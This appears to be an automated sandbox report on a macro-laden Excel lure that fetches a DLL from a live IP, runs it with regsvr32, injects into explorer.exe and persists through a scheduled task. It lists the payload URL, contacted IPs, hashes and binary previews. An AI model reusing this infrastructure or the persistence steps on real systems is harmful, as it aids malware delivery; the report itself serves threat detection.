Injects code into the Windows Explorer (explorer.exe) 29->80 82 Writes to foreign memory regions 29->82 86 2 other signatures 29->86 35 explorer.exe 8 1 29->35         started        44 C:\Users\user\Drezd.red, PE32 32->44 dropped 84 Uses cmd line tools excessively to alter registry or file data 32->84 38 reg.exe 1 32->38         started        40 reg.exe 1 32->40         started        signatures11 process12 signatures13 62 Uses cmd line tools excessively to alter registry or file data 35->62 64 Drops PE files to the user root directory 35->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 35->66 42 schtasks.exe 35->42         started        process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        No Antivirus matches

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat16%ReversingLabsWin32.Trojan.Generic

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        13.2.regsvr32.exe.1310000.7.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                        6.2.regsvr32.exe.2a80000.7.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.%s.comPA0%URL Reputationsafe
                        http://190.14.37.187/44467.9218096065.dat0%Avira URL Cloudsafe
                        http://servername/isapibackend.dll0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://190.14.37.187/44467.9218096065.datfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.%s.comPAregsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.881594655.0000000000E00000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmpfalse
                          		high
                          http://servername/isapibackend.dllregsvr32.exe, 00000005.00000002.619032737.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.615803827.0000000001FA0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.619851177.0000000001CD0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.620572592.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.635427701.0000000000910000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.632565051.00000000009E0000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          185.141.27.213
                          		unknownNetherlands
                          		60117HSAEfalse
                          190.14.37.187
                          		unknownPanama
                          		52469OffshoreRacksSAPAfalse
                          94.140.112.126
                          		unknownLatvia
                          		3212TELEMACHBroadbandAccessCarrierServicesSIfalse

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492656
                          Start date:28.09.2021
                          Start time:22:06:50
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 21s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:CompensationClaim-1033191014-09282021.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 18.6% (good quality ratio 17.5%)
                          • Quality average: 76.7%
                          • Quality standard deviation: 27.2%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/492656/sample/CompensationClaim-1033191014-09282021.xls

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          22:08:54API Interceptor29x Sleep call for process: regsvr32.exe modified
                          22:08:56API Interceptor861x Sleep call for process: explorer.exe modified
                          22:08:59API Interceptor1x Sleep call for process: schtasks.exe modified
                          22:09:00Task SchedulerRun new task: pajjxwey path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          HSAExls.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-2100058996-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-1657705079-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          #Qbot downloader.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          KHI13mrm4c.exeGet hashmaliciousBrowse
                          • 185.183.98.2
                          Copy of Payment-228607772-09222021.xlsGet hashmaliciousBrowse
                          • 185.82.202.248
                          NJS4hNBeUR.exeGet hashmaliciousBrowse
                          • 185.198.57.68
                          rQoEGMGufv.exeGet hashmaliciousBrowse
                          • 185.45.192.203
                          5ya8R7LxXl.exeGet hashmaliciousBrowse
                          • 185.45.192.203
                          Uz2eSldsZe.exeGet hashmaliciousBrowse
                          • 185.45.192.203
                          SWIFT_COPY.htmGet hashmaliciousBrowse
                          • 194.36.191.196
                          3hTS09wZ7G.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          OC2Z0JbqfA.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          89o9iHBGiB.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          DWVByMCYL8.exeGet hashmaliciousBrowse
                          • 185.183.96.3

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):259072
                          Entropy (8bit):5.307481689640455
                          Encrypted:false
                          SSDEEP:3072:0PQdEOItJPxluIalXQOr+nxQNBO0jTL23i7eBnaVImWeqSR4G78SYSuDSMv6UWo:MUr+nxQNBO0jf2Ee5aSzeF4DSY7Dh6e
                          MD5:EBEC2F5AC1E5F9D51D12FF7131795C35
                          SHA1:2C07EE3F23FD2A62373412D67DDBCA312445D29E
                          SHA-256:405E8907B3775351B266445FAE051055A10D97FB89ED926B5FA083F32028F5D4
                          SHA-512:0152F35C26DA5DAD857A5B8C23BD802D9B730D91C1916A25374B957440971FA6A2716F3C3F20FDF5343B752CE152511EC0D54122CD494957673221A28864C99A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!.........................0................................'......................................0..p....`'.|....p'..............................................................................`'..............................text...j........................... ..`.edata..p....0......................@..@.data........@...`..................@....data...0.$..P...h...|..............@....rdatat.n....`'.....................@....rsrc........p'.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162688
                          Entropy (8bit):4.254450821917616
                          Encrypted:false
                          SSDEEP:1536:C6LL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CSJNSc83tKBAvQVCgOtmXmLpLm4l
                          MD5:A14C77EBC9612D137C5C449C4C29D7D0
                          SHA1:4AEC86C6CB49ECF55901912335A6C73B904A737B
                          SHA-256:710FD6C039A9F994A82DCCEE89FA5D3D62205FE86D04CDF60B2C5BED4B23EF41
                          SHA-512:DEB21669E508B7F1CC77AC4CCDBCE313DC144D9313007DE63CC72082F27B8A00C4D91184244F8A4A58CAAE732681208AFFFEEA7D6E09D99A1BF250F09A7C8C54
                          Malicious:false
                          Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                          C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):15676
                          Entropy (8bit):4.532462039791388
                          Encrypted:false
                          SSDEEP:192:+xlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:+38xesT20lheZ3waE5D7qxIxkxe
                          MD5:D08B9B38579D2301F3ABF029EEB8545B
                          SHA1:D1380C1207548DF964A9B1C999FA87E4FF97E6A0
                          SHA-256:4B37BB903B50AC6258A27242BBE2A15A6079D2E1449A307A09226C8F65D6494D
                          SHA-512:F36E10159EA955F9E9276C84AF87A0229421CBBA2FA27D287DBA54B1B2A6F1E14F07C229BD559BA8155325A2EF7A6C1D775A170A68EDEF1E0F634FFAEE7C3168
                          Malicious:false
                          Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ..................p...E..Z..............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
                          C:\Users\user\Drezd.red
                          Process:C:\Windows\SysWOW64\explorer.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):259072
                          Entropy (8bit):2.3809766777560206
                          Encrypted:false
                          SSDEEP:1536:ar2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:KC6MtAAFNJ5XC5SYCi02r+J
                          MD5:2668EB3008687022521F18765324BE31
                          SHA1:260C9F618207ACE946E94FB3EF7D000536BE0636
                          SHA-256:2382A58FAE508FA15BD5D02A39504B9C2898E8737BA417CB6EE54BD2A8804989
                          SHA-512:0A880B74E8137EF1ADA7CFA03871AA69105444296229C1B4B71412FED43156A0EFB5145B0944EC6C39AB65CB880E7514F74820958862A88AAA7CDD150EBEB399
                          Malicious:true
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!.........................0................................'......................................0..p....`'.|....p'..............................................................................`'..............................text...j........................... ..`.edata..p....0......................@..@.data........@...`..................@....data...0.$..P...h...|..............@....rdatat.n....`'.....................@....rsrc........p'.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Tue Sep 28 08:54:40 2021, Security: 0
                          Entropy (8bit):7.0605219828223795
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:CompensationClaim-1033191014-09282021.xls
                          File size:140288
                          MD5:6c81ae06a5a6b766edca78e79caa44e9
                          SHA1:62771a1cf905d4346cc5d0a764eaf55e685a61d9
                          SHA256:b3e63f41617ed5bd3bb77a130be65bbbc500e927e7b21425d3d1fb484a7485bb
                          SHA512:3b109165a3cff4c755bbd56cabbd3dd6481d12e17bcf59df1b184f49690656e7b7591a9f48284a441f6b566501bead1ca324759be833edf20736259a214db4ec
                          SSDEEP:3072:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdAH11ScHlwFPYidH4C1TsNku0KRjkR+T99:Yk3hOdsylKlgxopeiBNhZF+E+W2kdAmi
                          File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          Static OLE Info

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          OLE File "CompensationClaim-1033191014-09282021.xls"

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:Test
                          Last Saved By:Test
                          Create Time:2015-06-05 18:17:20
                          Last Saved Time:2021-09-28 07:54:40
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Company:
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:1048576

                          Streams with VBA

                          VBA File Name: UserForm2, Stream Size: -1
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:-1
                          Data ASCII:
                          Data Raw:
                          VBA Code
                          VBA File Name: Module1, Stream Size: 1120
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                          VBA File Name:Module1
                          Stream Size:1120
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 d8 03 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: Module5, Stream Size: 3869
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                          VBA File Name:Module5
                          Stream Size:3869
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 01 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 5d 0c 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: Sheet1, Stream Size: 991
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1
                          Stream Size:991
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: ThisWorkbook, Stream Size: 2393
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook
                          Stream Size:2393
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 4d 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: UserForm2, Stream Size: 1181
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:1181
                          Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code

                          Streams

                          Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                          General
                          Stream Path:\x1CompObj
                          File Type:data
                          Stream Size:108
                          Entropy:4.18849998853
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:244
                          Entropy:2.65175227267
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:208
                          Entropy:3.33231709703
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . % . > . . . . . . . . . . .
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 111238
                          General
                          Stream Path:Workbook
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:111238
                          Entropy:7.57013249535
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . V d g t j g h k B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 08 00 00 56 64 67 74 6a 67 68 6b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 698
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:698
                          Entropy:5.28132485046
                          Base64 Encoded:True
                          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
                          Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
                          Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTlk
                          File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                          Stream Size:30
                          Entropy:1.37215976263
                          Base64 Encoded:False
                          Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
                          Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 140
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          File Type:data
                          Stream Size:140
                          Entropy:3.43277227638
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00
